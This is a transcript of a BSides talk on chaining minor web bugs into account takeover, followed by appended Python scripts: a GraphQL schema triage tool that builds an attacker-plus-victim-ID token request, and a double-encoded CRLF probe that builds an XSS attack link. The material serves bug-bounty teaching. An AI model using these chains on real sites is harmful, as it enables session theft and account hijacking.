
Tale of Chaining Bugs for Account Takeover

BSides Ahmedabad · 2022 · 15:37 · 2.7K views · Published 2023-02
Speaker: Harsh Bothra
About this talk
Harsh Bothra demonstrates how to escalate low-severity findings (open redirects, GraphQL introspection, Host header injection, CRLF injection) into critical account-takeover chains. Through real bug-bounty and pentest case studies, he shows the logical and technical techniques used to convert findings rated informative into high-value exploits.
Original YouTube description: Bug Bounty Show at BSides Ahmedabad 2022
Transcript [en]

Host: Now we can move to the next session. I guess everyone knows him; he is posting a challenge, posting learning, every day. Can we have a big round of applause for Harsh Bothra, who will present his talk on Tale of Chaining Bugs for Account Takeover.

Harsh Bothra: All right, hello everyone. Today I'll be talking about Tale of Chaining Bugs for Account Takeovers. A quick introduction: I work as an application security engineer, or you can say triager, at H1, so for a lot of folks I have handled your reports, and today I'm going to give you some tips on how you can convert your low-hanging fruits into some really dollar-giving bugs.

I am a co-lead pentester at Cobalt, and I also manage community and product growth with Ecto. I have authored two books; you might know me from the Learn365 or Security Explained series. I sometimes write blogs or create mind maps and content.

A quick agenda for today: we will discuss account takeover, and I'll leave you with a simple question, whether it's a vulnerability or an impact. Then some ignored vulnerabilities, or I would say low-hanging fruits, which usually get closed as informative or not applicable or something like that, and how you can utilize those vulnerabilities and convert them into high-paying vulnerabilities like account takeovers. And that's going to be all about it.

I have created a quick poll on Twitter; you can go to harshbothra_ and quickly answer whether it's a vulnerability class or an impact. What do you think account takeovers are: a vulnerability itself, or an impact?

So these are some of the ignored vulnerabilities, or mostly, I would say, ones that are closed as informative or low: open redirection, CRLF injection, GraphQL introspection query, missing Content Security Policy or HTTP security headers, Host header injection, rate limiting on APIs, fuzzing paths (for example, you have api.something.com and fuzzing is missing over there; people say we can do directory brute forcing and stuff like that, but you can do a lot of things), lack of server-side validation, external or I would say DNS interaction or something like that, prototype pollution, deep link misconfiguration if you are into mobile pentesting, OAuth misconfiguration since a lot of applications are using SAML SSO, and at the end HTML injection. These are a few ignored, or I would say low-hanging, bugs which generally in the bug bounty space are closed as informative, not applicable, or low.

Today I'll pick a few topics. I'll take four of the bugs that I have found which are some of the most paid bugs in the account takeover category, and they are pretty logical and easy to find. These are the four bugs: GraphQL introspection to account takeover, Host header injection to account takeover, CRLF which was leading to cross-site scripting and again to account takeover, and at last open redirection to account takeover.

Going with the first one: introspection queries usually give you schema information about GraphQL, and in most applications it's accessible as an unauthenticated user as well, right? A lot of you might have reported it on Bugcrowd, H1, or other platforms and seen that it gets closed as informative, saying that it's not leaking anything sensitive. But always go and visualize that particular query. In this case, the application was allowing any unauthenticated user to run the introspection queries; informative again. Now, after digging and visualizing, you can create a graph of these queries and see how various relationships and links are built on operations. I found two very interesting operations: get user ID by email, and generate auth token using email. This definitely caught the eye over there. Then, as an authenticated attacker, I'll sign up to the application, log in as the attacker account, and simply perform any authenticated action to reach the GraphQL endpoint. Once I am at the GraphQL endpoint, I'll manipulate the query to run the get-user-ID-by-email query. Now I have the user's UUID; emails are easy to guess, you can obviously create a list and brute force. So I now have the UUID, which is one of the complicated scenarios in bug bounty: you will see triagers asking, hey, how would you go and enumerate the UUIDs? Now, once I have the UUID, I can go ahead and try to get the auth token of the victim user. Here comes another problem: it won't throw me the token directly. So the next part was a logical manipulation, or you could say parameter pollution: on that operation I simply added attacker ID, comma, victim ID, and it threw me the victim's auth token. Now I can access the victim's session and perform the queries. The story still doesn't end here: using that victim auth token I was able to change their email address and then reset the password, and it led to full account takeover. Initially the severity was informative when I reported this bug, and then we escalated, because it was more on the curiosity part, and it ended up critical. It was a private program, and it was a five-digit bounty.

The next one is Host header injection on email change. A lot of times we hear that we do password reset poisoning: we find Host header injection on endpoints like reset password or change password, and it's an account takeover; that's a common vulnerability. This was an interesting one; this was from one of the pentests that I did. The application was sharing the same code base, so you could either sign up as an external user, for example harsh@gmail.com, as well as harsh@company.com, and from company.com you would have access to an additional dashboard that allows you to reset the password for all the users. I simply tried Host header injection on almost all the endpoints and terribly failed. I then ran Collaborator Everywhere, and on this email change endpoint I found that I could do the Host header injection. So what I did is simply try to change my external user, gmail.com, to harsh@company.com. The company.com guy received that email; he clicked on it, and I received the auth token, because I had the accounts, obviously; that was for the demo purpose. Once I was able to steal the confirmation token, I was able to escalate my privilege to that internal dashboard, and as soon as I had it I was able to change almost everybody's password, and that was a mass account takeover. Again, from an informative scenario to critical.

Great, so the next one is CRLF to cross-site scripting that led to account takeover. A lot of times we find cookie-based injections, cross-site scripting, which is closed as self-XSS. In this scenario there was a self-XSS via non-existing cookie parameters. I always say to fuzz the cookies; cookies have a lot of value, so anything like random=<cross-site scripting payload> will go and execute. Now I fuzzed the application further and found that there was a CRLF injection through double encoding; you had to double-encode the CRLF sequence. Now, using the CRLF sequence injection into a non-existing cookie parameter, I created a payload something like: something.com, then the CRLF injection payload, which is double encoded, then value=, then Cookie: XSS payload. Now this is a pure reflected XSS payload: anybody, any unauthenticated or authenticated user, will go to this particular link and it will execute as cross-site scripting. It's still a medium severity issue. Further, I was curious enough and noticed that the auth token, the JWT token, was passed as a cookie parameter as well as the Authorization header. In that scenario I was able to create a session hijacking PoC, hijack the user session, change their email, reset the password, and again full account takeover. Initially it was informative self-XSS, and you can chain it to something critical.

The last one is open redirection to account takeover. A lot of you might be thinking that triagers say open redirection issues are closed until you can demonstrate further security impact. So this is what you can do next time to demonstrate further impact. This particular application had multiple sub-applications. For example, you have quite a big set of applications, and you can go to, let's say, module A, module B, module C, and whenever you click on a specific module or sub-application it will generate an auth token to authenticate you to that sub-application. Now in that redirection parameter I was able to find an open redirection. Simply, the attacker was able to access the sub-application: because I set this particular parameter to, let's say, harsh.com, it redirected the token along with it, I was able to extract the token, and I was able to access the sub-applications. Now it was not critical, it was high, because I still could not access the main application; that's a different story, that I was able to privilege escalate later. So it was high, and the company awarded a three-digit bounty.

There are some other interesting scenarios as well, like HTML injection to AWS metadata leading to an AWS account takeover. For example, you have template generation functionality, for example in a website builder or something like that, where the HTML code is processed on the server side, or they are taking your HTML code and rendering it to generate, let's say, a form or preview pages. You can iframe the AWS metadata API, if it is not secured, and perform a complete AWS account takeover. On mobile phones, you can use insecure deep links to perform account takeover. Password reset poisoning is again a classical example. Mass assignment is like, you might have seen something like admin=true in the response, and you can add it into your request saying admin=true, and your low-privileged user becomes an admin user, something like that; then you can perform it on multiple places to perform account takeover. Lack of server-side validation of email during registration leading to account takeover: this is a very interesting scenario. For example, there is a public sign-up, but it allows sign-up only via company email, let's say harsh@company.com. Now what you can do, if the server-side validation is missing, is capture the request in your Burp Suite or ZAP proxy or anything, and simply change harsh@company.com to, let's say, harsh@gmail.com, and if there is no server-side validation you will be able to access the internal database.

Right, so that was my first blog on this vulnerability, and they pay really well for these scenarios because they are mostly logical bugs: they seem very easy to find, and they are a pretty high-reward thing, because most of the time the application owners care about their users and their data. So my target in bug bounties or pentesting is always first to focus on how you can target the logical or business-logic kind of things, how you can steal their data, and then I jump to the server-side attacks.

I have some next plans: I'll be launching an updated mind map on different techniques for account takeover, and there will be a more stretched version of this talk where I'll be explaining 20 different scenarios on account takeover.

A quick summary, the crux of this particular talk, is to dig deeper. Don't stop whenever you find a low-hanging vulnerability. If you have found, let's say, an open redirection or a self-XSS or something like that, give that vulnerability some time, go back to the application, find how you can chain different scenarios, and at the end of the day how you can add value to the program team, how you can give them something really critical or sensitive to patch. They really pay well, and trust me, chaining is something that is always helpful. Thank you folks for listening to me, and that's all. If you have any questions, feel free to ask.

Audience: I just have a simple question related to GraphQL. Each subject has its own mind map, and each mind map has its own methodology, so what kind of methodology should I keep while reading GraphQL?

Harsh Bothra: GraphQL is really interesting and fun to play with, every time. So what I do when I test GraphQL is I first go and check if I can access the introspection queries as an unauthenticated user, because it will give me a very good view of the schema and everything. Then I'll visualize it. After visualization, I usually go and search for some interesting operations. For example, in an application, sometimes you don't see the operations in use, but in the schema you will see those operations; these are more like undocumented operations, like on APIs you see undocumented endpoints. So look for those specific operations, and then see how you can utilize those operations and perform some interesting logical attacks over there. I have written a blog on GraphQL attacks; you can find it on Cobalt's website, so maybe you can go and have a read about it, and if you have any doubt, anything further, you can reach out to me on Twitter or LinkedIn and we can discuss as well.

Audience: My second question is similar to the first one. If you have to put GraphQL into simple words, what would it be? Sir, do you understand Hindi? Yeah, like, in simple words.

Harsh Bothra: They compressed all the API endpoints into a simple thing, right? It's like a one-stop shop for everything. It's like your supermarket, where you come to one place and you will get each and everything. So this is, I guess, a simple definition of GraphQL, I would say. Instead of going through all those thousand requests, you now have to care about securing only one endpoint, securing only one operation type, securing only one mutation type. It's like you need not have a very big variety of shops and keep ten watchmen over there; keep one supermarket, keep one watchman, and that's all. So it saves a lot of time for developers; it's easy for you to add new operations, new mutations, each and every time, and if you have one endpoint secured it does the job pretty well. I guess it answers your question, right? Any other questions?

Audience: Hi, my name is [inaudible]. First of all, thank you so much, it was an amazing talk. My question to you is that, as you mentioned about the CRLF and XSS, nowadays it is very rare to find a CRLF vulnerability, so do you use any particular wordlist for that, or how do you find those?

Harsh Bothra: Again, the point is, obviously CRLF is rare, but it has not totally disappeared, right? Usually what I do is I have my own fuzz list created; I use a simple Burp Intruder to fuzz it, so you can fuzz it, and again it's more about trying your luck and seeing if some application has that particular vulnerability open or not. It's possible it might not have, and it's possible it might have. Obviously it's obsolete because of new frameworks and everything, but again, fuzz it and see if it is getting reflected: simply set a value, and one thing you can also do is intrude it and also set a match and replace rule in Burp Suite and see if your response is getting reflected in Burp Suite, and that's how you can detect if this is vulnerable.

Audience: So you have a custom wordlist; you don't use a particular wordlist?

Harsh Bothra: Yeah, because obviously most of the bug bounty hunters and pentesters have their own wordlist, because at the end of the day you have to stand out of the crowd, so you have to work on your own kind of methods and techniques to go about finding the bugs.

Audience: Okay, thank you.

Harsh Bothra: Yep.

Host: All right, we are good to move forward. Thank you so much for the very informative session. Can we have a big round of applause for the amazing session. [Applause]
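Added example, not part of the talk or the speaker's tooling: the schema triage step that the GraphQL case study and the first audience question describe, as a script. It takes the JSON returned by an introspection query (here a constructed, trimmed `__schema` document; the operation names `getUserIdByEmail`, `generateAuthTokenForUsers` and `updateProfile` are hypothetical stand-ins for the operations the talk mentions), lists every root query and mutation with its argument types, flags the ones whose name, arguments or return type touch identity or session material, and builds the request body for a flagged operation, including the attacker-ID-plus-victim-ID argument list the talk used.

```python
"""Triage a GraphQL introspection result for account-takeover primitives.

Added example (not the talk's code). Assumes you already hold the JSON
returned by an introspection query; the sample below is constructed and
trimmed to the root types (User and Post are omitted), with hypothetical
operation names.
"""
import json
import re

# Constructed sample introspection response (only the root types are needed).
SAMPLE_INTROSPECTION = json.dumps({
    "data": {"__schema": {
        "queryType": {"name": "Query"},
        "mutationType": {"name": "Mutation"},
        "subscriptionType": None,
        "types": [
            {"kind": "OBJECT", "name": "Query", "fields": [
                {"name": "me", "args": [],
                 "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
                {"name": "listPosts",
                 "args": [{"name": "limit",
                           "type": {"kind": "SCALAR", "name": "Int", "ofType": None}}],
                 "type": {"kind": "LIST", "name": None,
                          "ofType": {"kind": "OBJECT", "name": "Post", "ofType": None}}},
                {"name": "getUserIdByEmail",
                 "args": [{"name": "email",
                           "type": {"kind": "NON_NULL", "name": None,
                                    "ofType": {"kind": "SCALAR", "name": "String", "ofType": None}}}],
                 "type": {"kind": "SCALAR", "name": "ID", "ofType": None}},
            ]},
            {"kind": "OBJECT", "name": "Mutation", "fields": [
                {"name": "generateAuthTokenForUsers",
                 "args": [{"name": "userIds",
                           "type": {"kind": "NON_NULL", "name": None,
                                    "ofType": {"kind": "LIST", "name": None,
                                               "ofType": {"kind": "SCALAR", "name": "ID", "ofType": None}}}}],
                 "type": {"kind": "SCALAR", "name": "String", "ofType": None}},
                {"name": "updateProfile",
                 "args": [{"name": "email",
                           "type": {"kind": "SCALAR", "name": "String", "ofType": None}}],
                 "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            ]},
        ],
    }}
})

# Triage heuristic: words that mark an operation as touching identity or
# session material. "auth" will also catch "author"; review hits by hand.
SENSITIVE = re.compile(r"email|token|password|reset|auth|secret|admin|user_?id", re.I)


def type_name(t):
    """Unwrap NON_NULL/LIST wrappers into SDL notation, e.g. [ID]!."""
    if t["kind"] == "NON_NULL":
        return type_name(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t["ofType"]) + "]"
    return t["name"]


def list_operations(introspection_json):
    """Return (kind, name, [(arg, type)], return_type) for every root field."""
    schema = json.loads(introspection_json)["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    ops = []
    for kind in ("query", "mutation", "subscription"):
        root = schema.get(kind + "Type")
        if not root or root["name"] not in types:
            continue
        for field in types[root["name"]].get("fields") or []:
            args = [(a["name"], type_name(a["type"])) for a in field.get("args", [])]
            ops.append((kind, field["name"], args, type_name(field["type"])))
    return ops


def flag_interesting(introspection_json, pattern=SENSITIVE):
    """Return (kind, name) for root operations matching the sensitive pattern."""
    hits = []
    for kind, name, args, ret in list_operations(introspection_json):
        haystack = " ".join([name, ret] + [f"{a}:{t}" for a, t in args])
        if pattern.search(haystack):
            hits.append((kind, name))
    return hits


def build_document(kind, name, args):
    """Build an anonymous operation with one variable per argument."""
    if not args:
        return f"{kind} {{ {name} }}"
    var_decls = ", ".join(f"${a}: {t}" for a, t in args)
    arg_list = ", ".join(f"{a}: ${a}" for a, _ in args)
    return f"{kind} ({var_decls}) {{ {name}({arg_list}) }}"


def graphql_body(kind, name, args, variables):
    """JSON request body for POST /graphql with the given variables."""
    return json.dumps({"query": build_document(kind, name, args), "variables": variables})


if __name__ == "__main__":
    for kind, name in flag_interesting(SAMPLE_INTROSPECTION):
        print(f"{kind:8} {name}")
    ops = {n: (k, a) for k, n, a, _ in list_operations(SAMPLE_INTROSPECTION)}
    kind, args = ops["generateAuthTokenForUsers"]
    # The talk's trick: pass the attacker's own ID alongside the victim's and
    # see whether the token for the second ID comes back. IDs are placeholders.
    print(graphql_body(kind, "generateAuthTokenForUsers", args,
                       {"userIds": ["attacker-uuid", "victim-uuid"]}))
```

Run it against a real introspection response by loading the file instead of `SAMPLE_INTROSPECTION`; the flagged list is where to start, and `list_operations` gives the exact argument types you need to call an operation that the front end never uses.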
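Added example, not part of the talk or the speaker's tooling: the CRLF case study and the last audience question, as a probe. It models a reflected parameter that ends up in a Set-Cookie header, a CRLF sequence that survives only when double URL-encoded (one layer decodes and strips raw CR/LF, the application decodes again), and a detector that parses the raw response to check whether the injected second Set-Cookie line actually split the header block. The server is a constructed, deliberately vulnerable function; the parameter name `lang` and cookie name `random` are assumptions.

```python
"""CRLF injection probe: double-encoded CRLF into a reflected Set-Cookie value.

Added example (not the talk's code). `vulnerable_response` is a constructed
stand-in for a server with two decoding layers; everything runs offline.
"""
from urllib.parse import quote, unquote

CRLF = "\r\n"


def encode_crlf(payload, rounds):
    """URL-encode the payload `rounds` times ("\\r\\n" -> "%0D%0A" -> "%250D%250A")."""
    out = payload
    for _ in range(rounds):
        out = quote(out, safe="")
    return out


def vulnerable_response(cookie_name, raw_value):
    """Constructed vulnerable server (assumption, not a real product).

    Layer 1 (front end / framework) decodes once and strips raw CR and LF, the
    naive filter that makes a single-encoded %0d%0a fail. Layer 2 (application)
    decodes again and reflects into Set-Cookie, so a value that was double
    encoded arrives at layer 2 as %0d%0a and becomes a real line break here.
    """
    once = unquote(raw_value).replace("\r", "").replace("\n", "")
    value = unquote(once)
    return (
        "HTTP/1.1 200 OK" + CRLF
        + "Content-Type: text/html" + CRLF
        + f"Set-Cookie: {cookie_name}={value}" + CRLF
        + CRLF
        + "<html>ok</html>"
    )


def parse_headers(raw_response):
    """Split a raw HTTP response into (status_line, [(name, value)], body)."""
    head, _, body = raw_response.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = [tuple(s.strip() for s in line.split(":", 1))
               for line in lines[1:] if ":" in line]
    return lines[0], headers, body


def set_cookies(raw_response):
    """Return {cookie_name: value} for every Set-Cookie header line."""
    _, headers, _ = parse_headers(raw_response)
    cookies = {}
    for name, value in headers:
        if name.lower() == "set-cookie":
            cname, _, cval = value.partition("=")
            cookies[cname.strip()] = cval.split(";", 1)[0].strip()
    return cookies


def crlf_probe(server, param_name, rounds, marker="crlfprobe"):
    """True if an injected Set-Cookie for a non-existing cookie lands as its own header."""
    injected = f"x{CRLF}Set-Cookie: random={marker}"
    response = server(param_name, encode_crlf(injected, rounds))
    return set_cookies(response).get("random") == marker


def attack_url(base_url, param_name, cookie_payload, rounds=2):
    """Link that plants `cookie_payload` into the cookie `random` on the victim.

    This is the talk's escalation: a self-XSS in a cookie value becomes a
    reflected XSS once a link can set that cookie for anyone who clicks it.
    """
    injected = f"x{CRLF}Set-Cookie: random={cookie_payload}"
    return f"{base_url}?{param_name}={encode_crlf(injected, rounds)}"


if __name__ == "__main__":
    for rounds in (0, 1, 2):
        print(f"encoding rounds={rounds}: injected={crlf_probe(vulnerable_response, 'lang', rounds)}")
    print(attack_url("https://target.example/set-lang", "lang", "<svg/onload=alert(1)>"))
```

In practice, replace `vulnerable_response` with a function that sends the request and returns the raw response bytes decoded as text; `set_cookies` is the same check the talk does with a Burp match-and-replace rule, only on the parsed header block, so a payload that merely lands inside the existing cookie's value (the single-encoded case) is not mistaken for a successful split.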